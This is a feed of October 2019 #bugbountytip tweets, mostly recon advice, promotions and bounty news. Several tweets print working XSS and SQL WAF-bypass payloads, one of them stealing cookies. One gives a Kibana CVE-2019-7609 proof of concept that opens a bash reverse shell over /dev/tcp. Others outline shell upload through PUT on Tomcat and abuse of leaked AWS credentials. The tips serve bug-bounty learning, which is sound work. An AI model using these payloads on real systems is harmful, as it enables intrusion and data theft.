0 #bugbountytip #bugbounty Don't use Automated exploit tools regarding CVE-2019-11510 - Pre-auth Arbitrary File Reading. Again I try to manually exploited successfully Data breach staff username and password via Pulse Secure Access. https://t.co/3QcJly45ez
Brute Logic
@brutelogic


2019-10-30 14:50:08
2 POI - #PHP Object Injection Leading zeroes & Arbitrary Chars Example: O:008:"stdClass":0001**s:006:"bypass";b:1;} (almost anything can be used in ** ) #bypass #bugbountytip https://t.co/A1dymKmBXV
Jake
@JCyberSec_


2019-10-30 12:00:16
0 I shall test your theory :: #bugbountytip - Don't share your #bugbountytips on Twitter as others will take your methods/tip and leave you with nothing 💰💰💵 https://t.co/OjTno2m0E1
Ismayil Tahmazov
@Tismayil1


2019-10-30 10:17:36
0 #bugbountytips Private Program Subdomains scanned with : https://t.co/LegySAU3sZ Found new subdomain https://t.co/bLxxHsKcuc -> ApacheTomcat 1 - Dirs scanned, found dir : /files/ 2- PUT method tested and worked. 3 - Shell Uploaded. Bounty : $XXX #bugbounty #bugbountytip https://t.co/8BL8bWvETi
Learner
@LearnerHunter


2019-10-30 08:26:48
1 Here is my 3rd blog post -> https://t.co/MEIkF0X64m @TipsBug #bugbountytip Thanks
Ravindra Sisodia
@InfoSecRavindra


2019-10-30 04:22:08
1 #bugbountytip Always use -b flag in sublist3r, always.
Abdelrhman
@OufZayed


2019-10-30 02:38:45
0 Subdomains Enumeration Cheat Sheet | via:@PentesterLand https://t.co/muezGpC4xg | #recon #bugbountytip
m0z
@LooseSecurity


2019-10-30 00:49:12
0 We're now at 500 members! #BugBounty #bugbountytip #bugbountytips #bugbounties https://t.co/VAYxaqFQNI
👻in🐚
@0xerror


2019-10-29 22:45:18
0 SQLi News: @brutelogic: 'Some MySQL tricks to break some #WAFs out there. SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\NFROM`test` [email protected]^1.FROM`test` SELECT-id-1.FROM`test` #SQLi #bypass #bugbountytip ' https://t.co/LCr62t6TKq, see more https://t.co/LbVOSRg1RN
Security Executions Code
@pwn0sec


2019-10-29 20:58:39
0 Information security & Penetration testing new facebook https://t.co/eW4Eo49aMC #bugbounty #bugbountytip #ssrf
Ismayil Tahmazov
@Tismayil1


2019-10-29 20:37:49
0 Application webview URL injection. APK decompiled and scanned. Found function : goSupport( url ) Created test for injection : com.example.auth://https://t.co/mJqV80lTKH Result : Application opened then webview redirect to my url. #BugBounty #bugbountytip #bugbountytips https://t.co/3CAwg0cnsO
bugbountytip
@a_l_e_r_t_1_


2019-10-29 18:39:22
0 https://t.co/fR7SA5JafD Let's hacking together everywhere !!! #BugBountyTip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-29 18:29:19
7 Some MySQL tricks to break some #WAFs out there. SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\NFROM`test` [email protected]^1.FROM`test` SELECT-id-1.FROM`test` #SQLi #bypass #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-29 17:09:22
0 The Web In Depth https://t.co/juiE7cWi2g Follow Us 💰💰💰💰 https://t.co/iNczOcXY13 Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-29 17:06:03
0 How To Become A Hacker Follow Us 💰💰 https://t.co/iNczOcXY13 Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/iYO8p512I4
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-29 17:00:50
0 Microsoft Tackles Election Security with Bug Bounties Follow Us 💰💰 https://t.co/iNczOcXY13 Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #pentesting #devsecops #cybersecurity #hackerone https://t.co/QIBjof1ffv
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-29 16:57:03
0 Bug Bounty — Tips / Tricks / JS (JavaScript Files) #Bugbounty #BugBountyTip #BugBountyTips https://t.co/GTENhwO3Qz
Avinash Jain
@logicbomb_1


2019-10-29 16:11:31
4 For developers- While developing apps with Spring boot, make sure you don't publically expose below endpoints. For Pentesters/Bug Bounty hunters- Check for below endpoints, it may contain sensitive information. #infosec #bugbounty #bugbountytip https://t.co/B5GJNJ6U4g
Shantanu Kulkarni
@Iamshantanukul


2019-10-29 14:20:45
0 Some MySQL tricks to break some #WAFs out there. SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\NFROM`test` [email protected]^1.FROM`test` SELECT-id-1.FROM`test` Thanks to @rodoassis #SQLi #bypass #bugbountytip #bugbounty #hackerone #bugcrowd
Brute Logic
@brutelogic


2019-10-29 14:16:22
36 Some MySQL tricks to break some #WAFs out there. SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\NFROM`test` [email protected]^1.FROM`test` SELECT-id-1.FROM`test` #SQLi #bypass #bugbountytip https://t.co/f7tKJFOcGs
Harshal
@Harshal81835744


2019-10-29 10:32:31
0 cloudflare «XSS» payload to bypass protection. {` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´} #BugBounty #BugBountyTip #WAF #infosec
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-29 09:02:16
5 Bug Bounty — Tips / Tricks / JS (JavaScript Files) Follow Us Bug Bounty $$$$-- https://t.co/iNczOcGmCt https://t.co/GTENhx5EI7 #BugBounty #BugBountyTip #JS #PenetrationTesting #pentesting #devops #devsecops #cybersecurity
Sayaan Alam
@alamsayaan


2019-10-29 04:51:56
0 It was Really a Long Way.... Finally On Google HOF @GoogleVRP #bugbounty #bugbountytips #togetherwehitharder #bugbountytip #hacking https://t.co/tB7cG6Ylyu
tololovejoi
@tolo7010


2019-10-29 03:29:31
0 Vulnerability gets your report triaged. Impact gets your report rewarded #bugbounty #bugbountytip #bugbountytips
bugbountytip
@a_l_e_r_t_1_


2019-10-29 01:17:49
0 Now 25+ download thank you. Learn & Hack & Earn more money. Good Hacking... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Brute Logic
@brutelogic


2019-10-28 14:19:16
19 Just an obfuscated alternative to alert(1): https://t.co/JzLTOrQIgp`javas\cript:al\ert(1)` PoC: https://t.co/Xpca5KfJtf #XSS #bugbountytip
Mohamed Sayed
@FlEx0Geek


2019-10-28 12:10:44
2 Topic about Open redirect https://t.co/DfW5qOqhg5 #BugBounty #bugbountytip
Mohamed Sayed
@FlEx0Geek


2019-10-28 12:10:24
0 Topic about Open redirect https://t.co/uBte9Ledhr #BugBounty #bugbountytip
Guhan Raja (குகன் ராஜா)
@havocgwen


2019-10-28 11:49:19
0 Check API requests by adding an invalid parameter sometimes it will be reflected as error in HTML and leads to XSS :) #bugbounty #bugbountytip #API #xss
PikaChu
@intx0x80


2019-10-28 10:15:37
0 PHP Execution 0-Day Discovered in Real World CTF Exercise https://t.co/VPLYXj5f1u #bugbountytip
Λявєη
@spenkkkkk


2019-10-28 09:32:16
0 Does subdomain takeover work for https://t.co/3MKBF2BrBG? #bugbounty #bugbountytip
Sayaan Alam
@alamsayaan


2019-10-28 06:35:00
0 Does anyone know what is going on here... I'm getting multiple profiles of Google HOF @GoogleVRP #bugbounty #bugbountytip #bugbountytips #bugbountyhelp #togetherwehitharder #google #hacking https://t.co/VOPcbCghWi
miraitowa
@miraitowa1


2019-10-28 00:26:07
1 Hacking JSON Web Tokens (JWTs) by @vickieli7 https://t.co/xR60oBxe7d #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-27 21:17:25
1 Now 25+ download thank you. Learn & Hack & Earn more money. Good Hacking... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Mahmoud Osama
@Mahmoud0x00


2019-10-27 16:34:59
3 #bugbountytip if you could to reach out to AWS credentials, Configure them in your terminal and then list s3 buckets `aws s3 ls` look for buckets with `AMAZON_SES_SETUP_NOTIFICATION` file, then you will have access to all emails got sent to this email + Ticket trick,You are in!!
Hendrik
@hendrikvb


2019-10-27 13:21:54
0 Silly @Burp_Suite trick of the day: Use advanced scope control for auto-scoping and unscoping, based on regex for ports, files, ports and protocols. #Burp #bugbountytip
SΛKYB
@sakyb7


2019-10-27 08:22:50
0 Hey guys, having hard time to understand http smuggling request.. portswigger web security challenge Video solutions: https://t.co/hZ8CGt6V61 (Basic CL TL Vulnerability) Find all solutions on this YT channel #bugbountytip #bugbounty
tololovejoi
@tolo7010


2019-10-27 01:55:07
0 Security is not so hard. You just need to know the concept #bugbounty #bugbountytip
Learner
@LearnerHunter


2019-10-27 01:06:18
1 Hello friends here is my new blog post in Bug Bounty Writeup Summary -> Please give suggestions/ideas after read Thanks https://t.co/wm0JvWB6Qt #bugbountytip #bugbounty
m0z
@LooseSecurity


2019-10-26 17:43:52
0 The best hacking tool is your brain. Train it! :D #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-26 16:44:55
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Sayaan Alam
@alamsayaan


2019-10-26 13:38:23
0 @lcblnc I had found a domain where Access control allow origin - true X frame option - sameorigin... Is it exploitable ...if yes then how.. #bugbounty #bugbountytips #bugbountytip #togetherwehitharder
Ammar Amer🇸🇾
@cry__pto


2019-10-26 10:06:16
3 free udemy courses for a limited time: -1-Master in Hacking with Metasploit: https://t.co/I25d3rBV6r -2-master object oriented php by building a web-application: https://t.co/5wJKzj2Tf0 #bugbountytip #hacking #pentest #cybersecurity #RedTeam #infosec
epxil0n
@lcblnc


2019-10-26 08:10:29
0 ClickJacking is present when these two headers are found. Access-Control-Allow-Origin: * X-Frame-Options: SAMEORIGIN #bugbountytips #bugbountytip #bugbounty
dark_warlord14
@dark_warlord14


2019-10-26 07:51:40
0 Scored my first bounty today on @Hacker0x01. Thank you @zseano @TomNomNom @brutelogic @NahamSec @s0md3v . Your work and notes have helped me to achieve this. #bugbountytip #bugbountytips https://t.co/2uJdRMwnGu
tololovejoi
@tolo7010


2019-10-26 05:36:02
0 A hacker ends his career when he stops learning new things. A company ends their bug bounty program when they stop developing new features. #bugbounty #bugbountytip
Pavandeep
@Pavandep8


2019-10-26 04:23:59
0 Look what I shared: Bypassing CORS - Saad Ahmed - Medium @MIUI| #bugbountytip #Hackers #security @infosecgirls https://t.co/Q8f8YDHFQv
Bibek Shah
@noobibek


2019-10-26 01:18:24
0 BugBounty Tip : If you see "call me" option while 2FA. Click it and check response, it might leak some sensitive info of the account. #bugbountytip #infosec
m0z
@LooseSecurity


2019-10-26 00:23:21
2 more information = more bugs #bugbountytips #BugBounty #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-25 22:51:40
0 The Shortest web shell #bugbountytip #rce https://t.co/wy7H21XL1r
Salah Baddou
@chmodxxx


2019-10-25 22:48:11
0 Whoops forgot to #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-25 22:27:30
0 Now 25+ download. Thank you !!! Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Ashkan
@11xuxx


2019-10-25 20:35:41
0 Trouble using aquatone? Try it like this: cat target.txt | ./aquatone -scan-timeout 500 -screenshot-timeout 300000 -http-timeout 30000 #bugbountytip
intigriti
@intigriti


2019-10-25 11:48:27
9 Sometimes, one character is all you need! Use % as a wildcard for codes, booking references or even SSN's! 🃏 Awesome #BugBountyTip, @itscachemoney! 👏 https://t.co/bDPq2uINaF
tololovejoi
@tolo7010


2019-10-25 11:14:35
1 The best tools for finding vulnerability are failure, patience, and dedication #bugbounty #bugbountytip
testter
@testter57721185


2019-10-25 09:35:27
0 #bugbountytips #bugbountytip Does knowing the ssokey of the user account constitute a security vulnerability ?
haqpl
@haqpl


2019-10-25 06:27:00
0 #bugbountytip Another trick to cause unexpected behavior of web app is to change the type of variable to an array by adding [] as a suffix to its name: ?var[]=1
lopseg
@lops3g


2019-10-25 03:04:50
0 Recently, I was looking for an XSS payload without spaces and slashes, but I didn't find one that worked. I built the below, it worked like a charm: <svg%0aonload=alert()> #bugbountytip
Sayaan Alam
@alamsayaan


2019-10-25 02:32:29
0 Yay... Got My First Bounty of $500 From Google.... The Way HOF Started #bugbounty #bugbountytip #hacking #togetherwehitharder .. Motivated By - @_jensec @ehsahil @sehacure @logicbomb_1 https://t.co/pEosbaurZO
A hacker's life
@Unknownuser1806


2019-10-24 13:40:51
0 Bypass Uppercase filters like a PRO (XSS Advanced Methods) https://t.co/WSvDTsESMe #poc,#bugbountytip,#bugbounty,#hacking,#cybersecurity,#infosec
intigriti
@intigriti


2019-10-24 12:44:30
12 The best way to cause errors exposing sensitive information? ➡️Long strings in POST parameters (50.000+ characters) ➡️Using the 'Euler number' (e) in numbers to gain exponentially large values Thanks for the #BugBountyTip, @pxmme1337! https://t.co/gPJ37I6o7z
Emre Selim
@emre_selim8


2019-10-24 12:44:29
0 Does BugCrowd pay bounty for "Won't Fix" Bugs? #BugBounty #BugBountyTip #BugCrowd
Sayaan Alam
@alamsayaan


2019-10-24 09:10:40
0 Hello Infosec Community.... So Guys Let's Everyone Share Their High school percentage.....Many Newbies Will Get Idea Who Thinks that they are not doing good... #bugbounty #bugbountytip #togetherwehitharder #ethical #hacking #hackerone #bugcrowd #cybersecurity
Yadhavi
@PrincessYadhavi


2019-10-24 08:53:30
0 How to hack Rabbitmq? #bugbounty #bugbountytips #bugbountytip
Sayaan Alam
@alamsayaan


2019-10-24 07:45:30
0 It was a Nice One... #bugbounty #bugbountytips #bugbountytip #togetherwehitharder https://t.co/ZOnkntsAvW
Henry Chen
@chybeta


2019-10-24 03:45:06
3 NOTICE THIS TWEET : https://t.co/x68iNP6F7u recommended configuration for nextcloud with nginx and php-fpm is vulnerable... #bugbounty #bugbountytip #bugbountytips https://t.co/cAqptRR0Ez
Håkon Lønmo
@WriteAV


2019-10-23 17:08:48
0 Just made the @visma hall of fame for security researchers. #bugbountytip, no bounty though :-)
Gwendal Le Coguic
@gwendallecoguic


2019-10-23 13:39:28
3 We always talk about methodology to find subdomains, but what about domains first ? What if you want to enlarge your scope, I use https://t.co/nTkWllAwGH https://t.co/VP7PDYC7VZ https://t.co/PfUAtO6Okp https://t.co/35MVruXUTz to find more domains owned by a company #bugbountytip
Gwendal Le Coguic
@gwendallecoguic


2019-10-23 13:05:49
1 Using @Hackerone as a recon tool. Some companies use formatted nicknames for team members/bots which is nice to find private programs you're not invited. Check the huge sitemap. #bugbountytip https://t.co/fILuM5WpDF
bugbountytip
@a_l_e_r_t_1_


2019-10-23 10:27:54
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #
Karna
@karna__1


2019-10-23 08:34:50
0 I forgot to take my laptop today and was super bored at my office. So I installed Termux (Android terminal) and started running my recon tools 😂🔥 Hit Termux if you forget your laptop! #bugbountytip #bugbountytips What other Android tools do you use @s0md3v https://t.co/fUPLoMGlk7
bugbountytip
@a_l_e_r_t_1_


2019-10-23 06:46:20
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Eduard Tolosa
@Edu4rdSHL


2019-10-22 20:27:50
2 Nice article explaining how to get Findomain working in Windows. It's recommended for any user that want to use your Windows OS for security testing. #BugBounty #bugbountytip #enumeration #subdomains #recon #hacking https://t.co/PT8G1B1Gyr
Aziz Hakim
@hackerb0y_


2019-10-22 19:50:46
0 #bugbountytip Create a mind map && make your own recon list #infosec #bugbounty
bugbountytip
@a_l_e_r_t_1_


2019-10-22 17:48:56
0 Less than 1$... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Murdockz
@Murdockz_CEH


2019-10-22 16:53:20
0 I earned $2,000 for my submission on @bugcrowd https://t.co/1IfbGhMzx1 #ItTakesACrowd API endpoint to create a new user account -> No Auth Token -> Created admin account with @target.com domain -> Admin Account Takeover. #bugbounty #bugbountytips #bugbountytip
Hendrik
@hendrikvb


2019-10-22 15:40:57
0 Build a custom wordlist for each dirsearch #recon, to include robots.txt, sitemap and spidered paths. #bugbountytip #BugBounty
Aashish Yadav
@aa5h15h


2019-10-22 15:34:08
2 Redis Unauthorized Access Vulnerability Simulation https://t.co/VvAv50TepM #bugbounty #bugbountytip #devops #linux #unix #windows #programmer #programming #like #retweet #followme #follow #python #php #java #redis #oscp https://t.co/m6EzTxV8G0
Luthra
@team0xL


2019-10-22 12:59:22
0 Awarded $1,000 bounty #bugbountytip Sometimes expired domain can help you to get juicy stuff. So, bruteforce the subdir on expired domain #bugbounty
Dawood Ikhlaq
@daudmalik06


2019-10-22 09:20:47
0 Found SQLI ? App is protected with incapsula waf by @Imperva ? blocking sleep keyword ? 😀 Just found the bypass of latest incapsula WAF sle%25p%28'0x12'%2b1) => sleep('ox12' + 1) write-up coming soon.. #sqli #bugbountytip @Imperva #incapsula #waf
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-22 06:25:29
1 from @EdOverflow : Thanks for the amazing #bugbountytip - https://t.co/zGwejuI2Xy
florens
@florens25301329


2019-10-21 23:25:58
0 Has anyone got any resources on XPath injection? #BugBounty #bugbountytip
Anshuman Pattnaik
@anspattnaik


2019-10-21 18:14:46
0 #bugbountytip #BugBountyTips I am trying to Smuggle an HTTP request with https://t.co/eVHtHgJ1d3 but in the response 411 status code "No Content-Length". Payload (Tried many other too) Content-Length: 5 Transfer-Encoding: cow chunked bar 0 Can you please suggest me any tips?
A hacker's life
@Unknownuser1806


2019-10-21 11:46:01
0 Recon resources Best article from @PentesterLand https://t.co/psZ1iens0p #bugbounty,#bugbountytip,#hacking,#infosec
Henry Chen
@chybeta


2019-10-21 11:41:06
8 writeup: ..%3B -> tomcat manager -> getshell https://t.co/ZEvOjcDhw8 #bugbounty #BugBountyTips #bugbountytip https://t.co/NBjLRgiaIt
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-21 10:22:03
0 #BUGBOUNTYTIP - When in Doubt , Enumerate ! Be Persistent! 🎖💸💸 💰💰💰💰 #bugbounty #bugbountytips
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-21 09:55:59
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #BugBountyTips #devsecops #cybersecurity #ceh #eccouncil https://t.co/0gfcgW7uTM https://t.co/kVnk39ItNa
Imran Parray
@CreedHackers


2019-10-21 09:14:19
0 When it comes to API testing finding new endpoints is one of the important technique that shouldn't be ignored at all. But most of the people do it wrong. Recursion techniques can be combined with endpoint extracting tools to get best out of them. #bugbountytip #cybersecurity https://t.co/ACV6BZXWt7 https://t.co/lLOhjFFPQj
Ammar Amer🇸🇾
@cry__pto


2019-10-20 15:22:12
4 free udemy courses for a limited time about : -1-hacking:https://t.co/lNIWJMNiM4 -2-malware:https://t.co/AaTAC6Av1U -3-upowork:https://t.co/FJBRRDzCnW -4-NGINX:https://t.co/XIOzfR8GWh #bugbountytip #hacking #malware #infosec #cybersecurity #PenTest #Linux
Max
@0xw2w


2019-10-20 13:15:43
1 Bug bounty tip: Always check allowed websites in CSP policy. There is a chance, that domain/bucket is not claimed or CSP pointing to file hosting. For example, I once found CSP was pointed to https://t.co/a5bttaghT7. #bugbountytip #togetherwehitharder
Saurav
@amian_saurav


2019-10-20 12:40:27
0 Finding deep level domains through simple dorking. site:*.site.com-www site:*.*.site.com-www site:*.*.*.site.com-www #BugBountyTips #BugBounty #bugbountytip
Henry Chen
@chybeta


2019-10-20 10:09:32
7 CVE-2019-7609 If you can't pop a shell via the last tweet , you can change poc like 👇 .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//') #BugBountyTips #BugBounty #bugbountytip https://t.co/BaeSZwDbGu https://t.co/XLGHJnxT0Y
Kenan
@h1_kenan


2019-10-20 07:52:45
5 KONA #WAF #bypass #XSS #bugbountytip asd"on+<>+onpointerenter%3d"x%3dconfirm,x(cookie) enjoy 😉👍
baaay
@abaykandotcom


2019-10-20 06:32:39
0 CodeLabs took the initiative to make it easier for you who want to learn XSS by making a 'labs' where anyone can try and/or learn XSS in a basic way. #xss #BugBounty #BugBountyTips #bugbountytip https://t.co/WIMJZS6pnj https://t.co/bJNfFdJutr
Kom[S]REd
@jauharali


2019-10-20 06:23:12
0 “A Study of Security Headers — Learning Notes” by Kom[S]REd https://t.co/YRKFYCnPX1 #pentest #bugbountytip #security
Eduard Tolosa
@Edu4rdSHL


2019-10-20 01:40:23
1 Findomain 0.6.0 is out! New features: * Option to discover subdomains IPs and save to file * Option to use quiet mode to remove informative messages * Add ability to save new domains found in a TXT file while monitoring. Please RT https://t.co/tkgBfKirNP #BugBounty #bugbountytip
Sudoka
@sudo_sudoka


2019-10-19 17:32:48
0 Analysis of #CVE-2019-16278, an #unauthenticated remote code execution in the Nostromo web server, aka nhttpd, a popular open-source web server in BSD systems. All versions up to the latest release 1.9.6 are vulnerable. Path traversal to RCE! #bugbountytip https://t.co/tzL9YrLXzI
Wareeq🕸🐁
@wareeq_shile


2019-10-19 17:05:36
0 Kindly subscribe and like their content @nvisium https://t.co/z5FtAQg8YC can we get a retweet? #BugBounty #bugbountytips #bugbountytip
John mash
@Techhelplistcom


2019-10-19 17:00:01
0 i have uploaded 126 new articles as a pdf files about different fields of hacking to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #bugbountytip https://t.co/fNomAu16P2 https://t.co/3SQwGkXxII
Ammar Amer🇸🇾
@cry__pto


2019-10-19 16:12:30
11 i have uploaded 126 new articles as a pdf files about different fields of hacking to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #bugbountytip https://t.co/q2layzVpKz https://t.co/7o4QgYRMvC
Shlomie Liberow
@Shlibness


2019-10-19 13:38:21
0 Submitted an HTTP Smuggling attack and was initially rejected on low impact but found a /redirect endpoint which followed a poisoned referer header. Since I was able to set poisoned headers to an external host... #bugbountytip https://t.co/kxBCsU2Y9d
A hacker's life
@Unknownuser1806


2019-10-19 12:47:41
0 From Multiple IDORs leading to Code Execution on a different Host Container https://t.co/v519vssv7q #bugbountytips,#bugbountytip,#cybersecurity,#infosec
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-19 12:42:04
0 Finally! Reported First XSS of my life 😅 on one of the private program @Hacker0x01. The application was sanitizing alert, script, ", etc But following payload got me through! <svg/onload=prompt (1)> #bugbountytips #bugbounty #bugbountytip
Nick (or hunt4p1zza)
@ngkogkos


2019-10-19 11:35:48
0 Just ate a well-known WAF for breakfast. <form><button formaction=javascript:top['ev'+'al'](self['\x61\x74\x6f\x62'](`YWxlcnQoMSk7`));// See picture for detailed explanation and tips. #bugbounty #bugbountytip Kudos: @PortSwiggerRes, @brutelogic, @wugeej . https://t.co/4Phkolgoso
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-10-19 05:33:51
3 🛡 « https://t.co/ItNKqoJWJC\%3C/onscroll/=1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))%3E Try this one. ⛑ dot shot. 💣 » #BugBounty #BugBountyTip #WAF #infosec
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-10-19 05:29:33
10 cloudflare «XSS» payload to bypass protection. 🦍 {` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´} #BugBounty #BugBountyTip #WAF #infosec
Sanketh Sharath
@sharathsanketh


2019-10-19 02:06:37
1 1st 4 1/2 months of bug bounty hunting: 1st bug-N/A 2nd -Dupe 3rd -Bounty 4th -Dupe 5th -No reply 6th -Dupe 7th -Dupe (this was a P2!) 8th -Won't fix This is tough,need to keep going! I believe tough times don't last! #bugbounty #bugbountytips #bugbountytip
Miguel Gonzales Jimenez
@z3r0cool


2019-10-19 01:39:08
1 Windows batch and PowerShell script that finds misconfiguration issues which can lead to privilege escalation https://t.co/FyAQ2tDzaL #bugbounty,#bugbountytip
Ishaq Mohammed
@security_prince


2019-10-18 16:15:41
0 @TheR0oT @nightwatch1337 This is one of the nicest #bugbountytip #bugbountytips for the #bugbounty hunters @Hacker0x01 @Bugcrowd @intigriti
Yadhavi
@PrincessYadhavi


2019-10-18 14:44:01
0 Any way to add custom headers to aquatone when screenshotting? #bugbounty #bugbountytips #aquatone #bugbountytip
intigriti
@intigriti


2019-10-18 11:47:03
7 Want to find 'cosmic brain' bugs, just like @0xACB and @samwcyo? 🤯 Use the following 'invisible' ranges in your payloads 👇#BugBountyTip 💥0x00 ➡️0x2F 💥0x3A ➡️0x40 💥0x5B ➡️0x60 💥0x7B ➡️0xFF https://t.co/B2WlIjEJXu
Ishaq Mohammed
@security_prince


2019-10-18 05:06:56
1 HTML5 storage manipulation (stored DOM-based) by @PortSwigger @PortSwiggerRes https://t.co/2DRcHzMwS3 #AppSec #xss #bugbountytip #bugbounty
Gopalsamy ( கோபால்சாமி )
@gopalsamy_


2019-10-18 03:19:31
0 Dear #infosec friends. Give me a suggestion, how you people are running #kalilinux tools on #ubuntu 🤗 please leave a comment below about the method that ur using :) #linux #ubuntu #bugbounty #bugbountytip #redteam #cybersecurity #hacking #hackers
A hacker's life
@Unknownuser1806


2019-10-18 02:43:25
0 Windows batch and PowerShell script that finds misconfiguration issues which can lead to privilege escalation https://t.co/sR7l2pnYH4 #bugbounty,#bugbountytip
Security Executions Code
@pwn0sec


2019-10-17 16:52:51
1 LIVE with Staf_SecurityPwn @andripwn Penetration Testing Introduction: Exploit & Reconnaissance https://t.co/EWBLAklv8D #bugbounty #bugbountytips #bugbountytip #hackerone #pwn0sec
bugbountytip
@a_l_e_r_t_1_


2019-10-17 06:00:53
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
John mash
@Techhelplistcom


2019-10-17 05:00:01
1 i have uploaded 82 new articles as a pdf files about different fields of hacking to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #linux #oscp #bugbountytip https://t.co/fNomAu16P2 https://t.co/R0WwN7R4Ah
Bhojpuri Chumma
@BChumma


2019-10-17 03:04:45
0 RT @cry__pto: i have uploaded 82 new articles as a pdf files about different fields of hacking to my github repository enjoy! #bugbountytip…
👻in🐚
@0xerror


2019-10-17 02:05:13
0 XSS News: @VishnuGadupudi: 'The 7 mains cases of XSS thanks @brutelogic #bugbountytip #xss ' https://t.co/mMIF2uJKPG, see more https://t.co/4VACxHYGGn
BlackClover
@Bc10ver


2019-10-17 02:05:12
0 Top story: @VishnuGadupudi: 'The 7 mains cases of XSS thanks @brutelogic #bugbountytip #xss ' https://t.co/GJk0qJDMBC, see more https://t.co/fVnXn9Z0FJ
Ammar Amer🇸🇾
@cry__pto


2019-10-17 01:49:56
2 i have uploaded 82 new articles as a pdf files about different fields of hacking to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #linux #oscp #bugbountytip https://t.co/q2layzVpKz https://t.co/PvL7gXzXKW
Nikhith
@Nikhith_


2019-10-16 19:54:37
0 I just wrote a blog post on #CVE-2019-17662 I found. This is a vulnerability I found in ThinVNC server. An arbitrary file read --> authentication bypass --> Full #VNC access. Can be helpful on a PT / Bug Bounty Read at: https://t.co/ASzbpcGwiE #InfoSec #bugbountytip
Youssef Lahouifi
@YLahouifi


2019-10-16 19:21:33
0 Use the organization field in a ssl certificate to find domain names associated with a company , you can use censys to perform such a task ... #bugbountytip #reconnaissance https://t.co/42vjFALFhq
Karna
@karna__1


2019-10-16 15:30:19
0 I'm serious. It's a #bugbountytip #bugbountytips #infosec #humans https://t.co/F7s0ZB0lFK
bugbountytip
@a_l_e_r_t_1_


2019-10-16 12:57:17
0 Less than 2$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #bughunters
bugbountytip
@a_l_e_r_t_1_


2019-10-16 10:37:51
0 Less than 2$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf
bugbountytip
@a_l_e_r_t_1_


